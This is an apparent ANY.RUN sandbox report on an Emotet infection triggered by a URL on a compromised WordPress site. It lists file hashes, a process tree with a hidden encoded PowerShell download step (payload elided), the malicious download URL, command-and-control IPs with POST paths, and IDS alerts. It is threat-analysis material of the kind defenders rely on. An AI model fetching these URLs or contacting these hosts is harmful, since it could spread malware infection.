URL: https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/

Full analysis: https://app.any.run/tasks/0a50b87c-f447-46c3-ad0a-4deedf144b7c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns.

Analysis date: January 17, 2020, 16:27:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: emotet-doc, emotet, loader, trojan, stealer
Indicators:
MD5: 90D0099D4793C2741F86B70FFD120907
SHA1: AF172F932C47591857033A29EA610E08A0C32321
SHA256: 36E8DDA2EE0D132BF8CB45ED2D298D2DDCD0B342F8D0995FD9A29EE14961FDC3
SSDEEP: 3:N8x17AIKjqSK/AVYAQuc9TG3XSTj0ID7Tr/MKn:27E3jqSK4VYAKyA0Ar/MK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report may be distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Drops known malicious document

      • opera.exe (PID: 3952)
    • Application was dropped or rewritten from another process

      • 858.exe (PID: 3920)
      • 858.exe (PID: 2140)
      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 2368)
      • serialfunc.exe (PID: 2900)
      • serialfunc.exe (PID: 3704)
    • EMOTET was detected

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3656)
    • Connects to CnC server

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
    • Emotet process was detected

      • 858.exe (PID: 2140)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
  • SUSPICIOUS

    • Creates files in the user directory

      • Powershell.exe (PID: 3656)
    • Executable content was dropped or overwritten

      • Powershell.exe (PID: 3656)
      • 858.exe (PID: 2140)
    • PowerShell script executed

      • Powershell.exe (PID: 3656)
    • Executed via WMI

      • Powershell.exe (PID: 3656)
    • Starts itself from another location

      • 858.exe (PID: 2140)
    • Connects to server without host name

      • serialfunc.exe (PID: 2456)
      • serialfunc.exe (PID: 3704)
  • INFO

    • Changes internet zones settings

      • iexplore.exe (PID: 4060)
    • Application launched itself

      • iexplore.exe (PID: 4060)
    • Manual execution by user

      • opera.exe (PID: 3952)
      • WINWORD.EXE (PID: 3004)
      • IMEKLMG.EXE (PID: 2536)
      • IMEKLMG.EXE (PID: 2956)
      • serialfunc.exe (PID: 2900)
    • Reads internet explorer settings

      • iexplore.exe (PID: 2188)
    • Reads Internet Cache Settings

      • iexplore.exe (PID: 2188)
      • opera.exe (PID: 3952)
    • Creates files in the user directory

      • iexplore.exe (PID: 2188)
      • opera.exe (PID: 3952)
      • WINWORD.EXE (PID: 3004)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3004)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 99
Monitored processes: 13
Malicious processes: 8
Suspicious processes: 0

Behavior graph

Graph nodes (edges are labelled "start" and "drop and start"; the graph is interactive in the full report): iexplore.exe, iexplore.exe, opera.exe, winword.exe (no specs), powershell.exe, 858.exe (no specs), #EMOTET 858.exe, serialfunc.exe (no specs), #EMOTET serialfunc.exe, imeklmg.exe (no specs), imeklmg.exe (no specs), serialfunc.exe (no specs), #EMOTET serialfunc.exe

Process information

PID 4060 (parent process: explorer.exe)
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" "https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/"
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Internet Explorer | Exit code: 1 | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 2188 (parent process: iexplore.exe)
  CMD: "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:4060 CREDAT:71937
  Path: C:\Program Files\Internet Explorer\iexplore.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: LOW | Description: Internet Explorer | Exit code: 0 | Version: 8.00.7600.16385 (win7_rtm.090713-1255)

PID 3952 (parent process: explorer.exe)
  CMD: "C:\Program Files\Opera\opera.exe"
  Path: C:\Program Files\Opera\opera.exe
  User: admin | Company: Opera Software | Integrity Level: MEDIUM | Description: Opera Internet Browser | Exit code: 0 | Version: 1748

PID 3004 (parent process: explorer.exe)
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\REP_HQQ_010120_TVE_011720.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Exit code: 1073807364 | Version: 14.0.6024.1000

PID 3656 (parent process: wmiprvse.exe)
  CMD: Powershell -w hidden -en [encoded command elided in this copy of the report]
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows PowerShell | Exit code: 0 | Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 3920 (parent process: Powershell.exe)
  CMD: "C:\Users\admin\858.exe"
  Path: C:\Users\admin\858.exe
  User: admin | Integrity Level: MEDIUM | Description: PromptEdit_Demo MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 2140 (parent process: 858.exe)
  CMD: --e90241f9
  Path: C:\Users\admin\858.exe
  User: admin | Integrity Level: MEDIUM | Description: PromptEdit_Demo MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 2368 (parent process: 858.exe)
  CMD: "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"
  Path: C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
  User: admin | Integrity Level: MEDIUM | Description: PromptEdit_Demo MFC Application | Exit code: 0 | Version: 1, 0, 0, 1

PID 2456 (parent process: serialfunc.exe)
  CMD: --d6864438
  Path: C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
  User: admin | Integrity Level: MEDIUM | Description: PromptEdit_Demo MFC Application | Exit code: 1073807364 | Version: 1, 0, 0, 1

PID 2536 (parent process: Explorer.EXE)
  CMD: "C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE" /SetPreload /JPN /Log
  Path: C:\Program Files\Common Files\microsoft shared\IME14\SHARED\IMEKLMG.EXE
  User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Office IME 2010 | Exit code: 1 | Version: 14.0.4734.1000
Total events: 3 195
Read events: 2 125
Write events: 0
Delete events: 0

Modification events

No data

Executable files: 2
Suspicious files: 34
Text files: 18
Unknown types: 13

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
4060 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF03AACB2FAAB7E5AF.TMP | - | - | -
4060 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | - | - | -
4060 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | - | - | -
4060 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\~DF1E320E4F9B422547.TMP | - | - | -
4060 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{44D05C85-3946-11EA-AB41-5254004A04AF}.dat | - | - | -
3952 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\opr5965.tmp | - | - | -
3952 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\opr5995.tmp | - | - | -
3952 | opera.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UDRELETTKZ5J6J6XOMLI.temp | - | - | -
3952 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\operaprefs.ini | text | 9DC54AC94813D88D3A0C2C1A5F60EA59 | 1295BE441A6709184C0A46BDFF1A7DB039F124E5B12CB78DA8B12D3740AFAE2A
2188 | iexplore.exe | C:\Users\admin\AppData\Local\Temp\Low\JavaDeployReg.log | text | 96D5F8D1C0C1931340BDB3201D39D5A6 | E7295D4ADEEB85641700A6C216B03507A080EF6692824AB284B62A4DFD085ED8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 33
TCP/UDP connections: 176
DNS requests: 203
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
3952 | opera.exe | GET | 200 | 185.26.182.94:443 | https://certs.opera.com/03/ev-oids.xml | unknown | xml | 88.1 Kb | whitelisted
3656 | Powershell.exe | GET | 200 | 208.91.198.220:80 | http://neilwilliamson.ca/backup/kxWH/ | US | executable | 332 Kb | suspicious
3952 | opera.exe | GET | 200 | 185.26.182.94:443 | https://certs.opera.com/03/repository.xml | unknown | xml | 41.5 Kb | whitelisted
2456 | serialfunc.exe | POST | 200 | 100.6.23.40:80 | http://100.6.23.40/qbDP67Hi9r9jCc0Q | US | binary | 1.38 Mb | malicious
2456 | serialfunc.exe | POST | 200 | 91.236.4.234:443 | http://91.236.4.234:443/T6TxmLb2sgrq | PL | binary | 148 b | malicious
2456 | serialfunc.exe | POST | 200 | 91.236.4.234:443 | http://91.236.4.234:443/T6TxmLb2sgrq | PL | binary | 148 b | malicious
2456 | serialfunc.exe | POST | 200 | 100.6.23.40:80 | http://100.6.23.40/T6TxmLb2sgrq | US | binary | 148 b | malicious
3952 | opera.exe | GET | 200 | 165.227.242.25:443 | https://atomlines.com/demo/andywordpress/wp-content/payment/yz3ocshxn/1mzzdrn-32645675-361-lh46ru-zm3yhc5juppi/ | US | document | 251 Kb | unknown
2456 | serialfunc.exe | POST | 200 | 91.236.4.234:443 | http://91.236.4.234:443/exdsd6uWcV7btG | PL | binary | 4.52 Kb | malicious
2456 | serialfunc.exe | POST | 200 | 91.236.4.234:443 | http://91.236.4.234:443/T6TxmLb2sgrq | PL | binary | 148 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4060 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
2456 | serialfunc.exe | 91.236.4.234:443 | - | FHU Climax Rafal Kraj | PL | malicious
2456 | serialfunc.exe | 194.25.134.114:993 | secureimap.t-online.de | Deutsche Telekom AG | DE | unknown
4060 | iexplore.exe | 13.107.21.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted
2188 | iexplore.exe | 165.227.242.25:443 | atomlines.com | - | US | unknown
2456 | serialfunc.exe | 96.22.246.161:110 | pop.videotron.ca | Videotron Telecom Ltee | CA | unknown
3952 | opera.exe | 165.227.242.25:443 | atomlines.com | - | US | unknown
2456 | serialfunc.exe | 212.227.15.132:995 | pop.1and1.es | 1&1 Internet SE | DE | unknown
2456 | serialfunc.exe | 100.6.23.40:80 | - | MCI Communications Services, Inc. d/b/a Verizon Business | US | malicious
2456 | serialfunc.exe | 64.233.167.109:995 | pop.gmail.com | Google Inc. | US | whitelisted

DNS requests

Domain | IP | Reputation
atomlines.com | 165.227.242.25 | unknown
www.bing.com | 204.79.197.200, 13.107.21.200 | whitelisted
certs.opera.com | 185.26.182.94, 185.26.182.93 | whitelisted
sitecheck2.opera.com | 185.26.182.111, 185.26.182.112, 185.26.182.94, 185.26.182.93 | whitelisted
neilwilliamson.ca | 208.91.198.220 | suspicious
ia.kvj.z | - | unknown
mi.gt.z | - | unknown
scr.misv.o | - | unknown
ia.esr.o | - | unknown
p1ia.alm.o | - | unknown

Threats

PID | Process | Class | Message
3656 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP
3656 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3656 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP
2456 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5
2456 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6
2456 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2456 | serialfunc.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet
2456 | serialfunc.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST)
2456 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M5
2456 | serialfunc.exe | A Network Trojan was detected | ET TROJAN Win32/Emotet CnC Activity (POST) M6
No debug info